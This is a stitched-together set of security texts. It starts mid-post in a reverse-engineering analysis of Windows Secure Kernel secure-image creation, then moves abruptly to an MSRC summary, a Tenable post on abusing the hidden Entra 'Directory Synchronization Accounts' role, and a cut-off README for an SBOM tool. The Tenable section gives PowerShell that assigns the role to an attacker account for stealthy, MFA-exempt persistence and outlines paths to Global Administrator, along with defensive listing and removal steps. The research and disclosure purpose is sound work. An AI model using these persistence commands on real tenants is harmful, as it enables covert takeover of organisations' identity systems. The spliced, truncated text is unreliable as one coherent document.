Taking a look back at how the MDL looks, we can see that StartVa, which is the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains nt!_IMAGE_DOS_HEADER header (0x5a4d is the magic (MZ) for a PE file and can be found in the beginning of the image, which is what a kernel image is).

However, although this looks to be the “base image”, based on the alignment of Mdl->StartVa, we can see quickly that ByteCount tells us only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness) we can actually see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although the StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. Even though the StartVa is aligned like a base address, the fact of the matter is the actual address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to clearly see that the image has only been mapped into memory. It has not been fully loaded - and only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this to be the case with actual data that shows many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first paramter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents region described by the MDL (which are the headers).

The first thing that VTL 1 will do is take the MDL we just showed, provided by VTL 0, and creates a new MDL in VTL 1 that describes the provided MDL from VTL 0. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, and any offset in ByteOffset. This is why the VTL 0 MDL is address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL in the page is set in ByteOffset.

Additionally, from the previous image, we can now realize what the first page frame number used in our Secure System Call parameters is used for. This is the PFN which corresponds to the MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical page of memory is simply (page frame number * PAGE_SIZE + any offset). Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can clearly see that there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that for the PTE of the VTL0 MDL the PFNs align!

This MDL, after construction, has StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on the MDL.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks now occur on this new mapping, instead of directly operating on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL (not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL) is created. This MDL will be an actual copy of the now verified contents of the VTL 0 MDL. In otherwords, thirdNewMDl->StartVa = StartAddressOfHeaders (which is start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see that since VTL 1 has created this new MDL, the page frame number (PFN) of the VTL 0 MDL was provided since a mapping of virtual memory is simply just creating another virtual page which is backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL, which is mapped into VTL 1 and has now had all contents verified. We now return back to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This then allows VTL 1 to have a memory buffer where the contents of the image from VTL 0 resides. We can clearly see below this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory which VTL 0 sent in the first place contains a legitimate image in order to create a securekernel!_SECURE_IMAGE object. It is also at this point that we determine if we are dealing with the 32-bit or 64-bit architecture.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is flushed out, a call to an external function SkciCreateSecureImage is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know in the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we also don’t know what they are. The last value I noticed was consistently this 0x800c constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see this function doesn’t create the object itself but it creates a “Secure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function, and it accepts two parameters - one an input and one an output or return. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of the options is 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size based on function name and the fact the actual return value is of type NTSTATUS) is set to 0x20. This effectively insinuates that since obviously 0x800C is not a 0x20 byte value, nor a hash, that 0x800C must instead refer to a type of hash which is likely associated with an image. We can then essentially say that the last Secure System Call parameter for secure image creation is the “type” of hash associated with this image. In fact, looking at cross references to this function reveals that the function skci!CiInitializeCatalogs passes the parameter skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning that the first parameter actually specifies the hash algorithm.

After calculating the hash size, the Secure Image Context is then built out. This starts by obtaining the Image Headers (nt!_IMAGE_NT_HEADERS64) headers for the image. Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownULong1 was updated to ImageSize. I wish I had a better way to explain as to how I identified this, but in reality it happenstance as I was examining the optional headers I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure and seeing that ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to a generic 0x1c0000000 address instead of the virtual address which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which will be used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This infers to us the “unknown bool” is really an indicator whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created, but wouldn’t be available later otherwise.

The reader should know - I asked Andrea a question about this. The answer here is that a file can either be page-hashed or file-hashed signed. Although the bool gates creating the Verification Context, it is more aptly used to describe if a file is file-hashed or page-hashed. If the image is file-hashed signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hashed signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask, based on the parameters surrounding the creation of the section object that will back the loaded driver is formed. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this. Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and when bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - which has a value of 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask will finally make its way to ci!CiGetActionsForImage. This call, as the name infers, returns another bitmask based on our 0x40000001 bitmask. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader. This new returned bitmask gives instructions to the header validation function as to what actions to take for validation.

As previous art shows, depending on the bitmask returned the header validation is going to be done via page hash validation, or file hash validation by supplying a function pointer to the actual validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file itself hashed. However, we must consider things like a driver being paged out and paged in. When an image is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, and never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously since it is “file-hashed”), skci.dll will create something called a “Page Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageeIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;
} SECURE_IMAGE_CREATE_ARGS;

Moving on, the first thing this function (since we are dealing with a file-hashed image) does is actually call two functions which are responsible for creating additional contexts - the first is an “Image Hash Context” and the second is a “Page Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a “context” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image. Otherwise file-hashed images would not have a way to be verified in the future as only page hashes are used for verification of the image. Page Hash Context are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over of the sections available in the image being processed and to capture how many pages make up each section (determines how many pages make up all of the sections of the image).

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image are stored in the Page Hash Context. Additionally, the Page Hash Context is then allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).

After this, the Page Hash Context information is filled out. This begins by only storing the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which contains also the Page Hash and Image Hash Contexts) have been created (but as we know will be updated with more information later), skci!SkciCreateSecureImage will then sort and copy information from the Image Section Headers and store them in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and stores it in the Secure Image Context directly this time. This also means the Secure Image Context is returned by the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - which is the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which infers that when the MDL is constructured, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the Optional Header. This validates what we mentioned at the beginning of the blog where although the “base address” is used as the first Secure System Call parameter, this could be more specifically referred to as the “headers” for the image.

The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables, which are used to track threads and NARs (securekernel!SkiThreadTable/securekernel!SkiNarTable). These are of type “sparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, but instead of it being unordered the data is ordered which allows for faster lookups. It works by supporting 0x10000000, or 256,000 entries. Note that these entries are not all allocated at once, but are simply “reserved” in the sense that the entries that are not in use are not mapped.

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where this Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) “index” structure. This determines the index into the table where the object is stored. In the case of storing a new entry, on 64-bit, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will get filled out with more and more information. Some of the first data collected is if the image is already loaded in a valid kernel address. From the blog earlier, we mentioned the Secure Image loading occurs when an image is first mapped but not loaded. This seems to infer it is possible for a Secure Image to be at least already loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected is the Virtual Address and Size of the Load Config Data Directory.

The next items start by determining if the image being loaded is characterized as a DLL (this is technically possible, for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, for each of the sections in the image, the prototype PTEs for the image (via securekernel!SkmiPopulateImagePrototypes) are populated. If you are not familiar, when a shared memory region is shared for, as an example, between two-processes an issue arises at the PTE level. A prototype PTE allows easily for the memory manager to track pages that are shared between two processes. As even Windows Internals, 7th Edition, Part 1, Chapter 5 states - prototype PTEs are created for a pagefile-backed section object when it is first created. The same this effectively is happening here, but instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel now obtains a pointer to the prototype PTEs.

After this, additional section data and relocation information for the image is captured. This first starts by checking if the relocation information is stripped and, if the information hasn’t been stripped, the code captures the Image Data Directory associated with relocation information.

The next thing that occurs is, again, each of the present sections is iterated over. This is done to capture some important information about each section in a memory allocation that is stored in the Secure Image object. Specifically here, relocation information is being processed. The Secure Image object creation logic will first allocate some memory in order to store the Virtual Address page number, size of the raw data in number of pages, and pointer to raw data for the section header that is currently being processed. As a part of each check, the logic determines if the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

Additionally, we saw previously that if the relocation information was stripped out of the image, the Secure Image object (at offset 0x50 and 0x58) were updated with values of false and true, 0 and 1, respectively. This seems to indicate why the relocation information may not be present. In this case, however, if the relocation information wasn’t stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these boolean values are updated to true and false, 1 and 0, respectively. This would seem to indicate to the Secure Image object why the relocation information may or may not be present.

The last bits of information the Secure Image object creation logic processes are:

  1. Is the image being processed a 64-bit executable image or are the number of data directories at least 10 decimal in amount to support the data directory we want to capture? If not, skip step 2.
  2. If the above is true, allocate and fill out the “Dynamic Relocation Data”

As a side-note, I only determines the proper name for this data is “Dynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage - which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (after we get through this last bit of information that is processed, we will talk about this routine in more detail). In the securekernel!SkmiDeleteImage logic, a few pointers in the object itself are checked to see if they are allocated. If they are, they are freed (this makes sense, as we have seen there have been many more memory allocations than just the object itself). SecureImageObject + 0xB8 is checked as a place in the Secure Image object that is allocated. If the allocation is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the “Dynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load configuration Image Data Directory. The information about the load config data is verified, and the virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table is just the load config directory of an executable.

This is the last information the Secure Image object needs for the initialization (we know more information will be collected after this Secure System Call returns)! Up until this point, the last parameter we haven’t touched in the securekernel!SkmmCreateSecureImageSection function is the last parameter, which is actually an output parameter. The output parameter here is filled with the results of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter will be stored in the original Secure System Call arguments at offset 0x10 (16 decimal)

This handle is also stored in the Secure Image object itself. This also infers that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the control area for the section object which backs the image (in VTL 0) itself. This is stored in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that this isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is something at least to note here. As another point of contention, the way I knew this handle would eventually be stored here is because when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of the Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will put that analysis into another blog post. The future post we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation before the image is actually loaded fully into VTL 0. Before we close the blog post, it is worth taking a look the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the “clean-up” code for the end of the function (securekernel!SkmmCreateSecureSection) dereferences the object if the object was created but failure occured during the setting up of the initial object. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. The reference count for an object, historically, on Windows is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20 byte header! Taking a look at securekernel!SkobpDereferenceObject we can clearly see that within this header the reference count itself is stored at offset 0x18. We can also see that there is an object destructor, contained in the header itself.

Just like regular NT objects, there is a similar “OBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. This can be corroborated by the interested reader by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following are a list of most of the valid objects in the Secure Kernel I located (although it is unclear without further analysis what many of them are used for):

  1. Secure Image Objects (securekernel!SkmiImageType)
  2. Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
  3. Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
  4. Secure Enclave Objects (securekernel!SkmiEnclaveType)
  5. Secure Hal Extension Object (securekernel!SkhalExtensionType)
  6. Secure Allocation Object (securekernel!SkmiSecureAllocationType)
  7. Secure Thread Object (securekernel!SkeThreadType)
  8. Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
  9. Secure Section Object (securekernel!SkmiSectionType)
  10. Secure Process Object (securekernel!SkpsProcessType)
  11. Secure Worker Factory Object (securekernel!SkeWorkerFactoryObjectType)
  12. Secure PnP Device Object (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

Legitimately, at the end of the analysis I did for this blog, I stumbled across these wonderful documents titled “Security Policy Document”. They are produced by Microsoft for FIPS (The Federal Information Processing Standard). They contains some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.

Conclusion

I hope the reader found at least this blog to not be so boring, even if it wasn’t informational to you. As always, if you have feedback please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post (so any errors in this post are completely mine). If, again, there are issues identified please reach out to me so I can make edits!

Peace, love, and positivity!

Improved Guidance for Azure Network Service Tags

Summary Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID

Summary

The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the Directory Synchronization Accounts role among the around 100 built-in Entra roles. This role has the ID “d29b2b05–8046–44ba-8758–1e26182fcf32”, it has the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect since it can be assigned technically, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>@tenant.example.net”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account” but which has a UPN with this syntax: “[email protected]” instead.

This role grants to the Entra service user, the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their password in Entra when it changes in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID allowing to activate multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa @DrAzureAD, the “Directory Synchronization Accounts” role assignees are excluded from security defaults!

Dr. Nestori Syynimaa on Twitter: "Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE / Twitter"

Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE

Nestori also confirmed that the limitation concerns all those assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this since the legitimate accounts are user accounts, thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is the proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account apparently having 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually I tested it in several of my tenants and I noticed that the role was displayed in another tenant:

I suppose that the portal is running a different version of the code, or due to a feature-flag or A/B testing, because this one uses the MS Graph API (on graph.microsoft.com) to list the role assignments:

Whereas the other uses a private API (on api.azrbac.mspim.azure.com):

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role, isn’t it? Well, as you guessed, it’s hidden too 🙈 (in all my tenants: no difference here):

Note that for those that prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “microsoft.directory/passwordHashSync/allProperties/allTasks” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

  • Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
  • Only if Password-Hash Sync (PHS) is enabled, but the role allows to enable it
  • Only via the private “Azure AD Synchronization” API, that is implemented in AADInternals, whose endpoint is https://adminwebservice.microsoftonline.com/provisioningservice.svc and it must not be confused with other similarly named APIs: the public Microsoft Entra Synchronization API, or the private Azure AD Provisioning API. So, the reset must be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
  • Not exploitable if the target has MFA or FIDO2 authentication enforced since the password can still be reset but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article, but in a summary, the idea is to identify an application or service principal having powerful Microsoft Graph API permissions, then abuse the “microsoft.directory/applications/credentials/update” or “microsoft.directory/servicePrincipals/credentials/update” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. Thus allowing to authenticate as the service principal, and abuse the appropriate method corresponding to the dangerous Graph API permission to escalate to Global Admin.

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.

Manage role assignment

Since one cannot manage this role using Azure portal nor Entra admin center, how to list or manage its assignees? We will see how, using the Microsoft Graph PowerShell SDK since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command allows to list the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (as seen in the beginning) instead of its name for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals” which can be either users, groups, or service principals (undocumented 😉), so different types of objects.

In this example I have specified the “Domain.Read.All” Graph API permission when connecting, because it is usually already delegated, but the least privileged permission is actually “RoleManagement.Read.Directory”.

Add role assignment

And how an attacker wishing to abuse this role for stealthy persistence would assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId [email protected]
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example if Entra Connect / Entra Cloud Sync was never configured), the role instance must be created from the role template before usage, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>

Recommendations

➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see those, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the set up date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution, with a better user experience, allowing to discourage the usage of the “Directory Synchronization Accounts” role, without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.


Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions


This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.


Installation

The packages needed are mentioned in the requirements.txt file and can be installed using pip:

pip3 install -r requirements.txt

Usage

  • First of all install the packages.
  • Secondly , you need to set up environment variables such as:
    • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.
  • Finally run the tool to list all the packages.
Argument Description
--analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
--static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
--volume-path Specifies the path to the mounted volume. Default is /mnt.
--save-file Specifies the output file for JSON output.
--info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
--pkg-mgr Manually specify the package manager or dont add this option for automatic check.
APT:
- Static Info Analysis:
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
- It analyzes the packages installed on the mounted volume located at /mnt.
- It saves the output in a JSON file named output.json.
- It generates visual plots for CHROOT analysis.
```bash
